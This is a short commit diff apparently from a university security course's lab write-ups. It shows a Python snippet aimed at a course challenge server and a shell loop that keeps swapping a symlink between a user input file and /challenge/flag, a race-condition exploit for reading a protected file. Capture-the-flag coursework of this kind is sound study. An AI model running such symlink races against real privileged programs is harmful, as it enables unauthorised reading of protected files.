Lab3 wu
This commit is contained in:
@@ -1,5 +1,4 @@
|
||||
from grequests import Session
|
||||
from sys import argv
|
||||
from os import fork
|
||||
|
||||
BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25652"
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
#!/bin/sh
|
||||
|
||||
while [ 1 -eq 1 ]; do
|
||||
ln -s ./input ./link
|
||||
ln -s /challenge/flag ./link
|
||||
ln -fs ./input ./link
|
||||
ln -fs /challenge/flag ./link
|
||||
done
|
||||
|
||||
Submodule pa/writeups updated: a67c3913db...1b7eaa9a45
Reference in New Issue
Block a user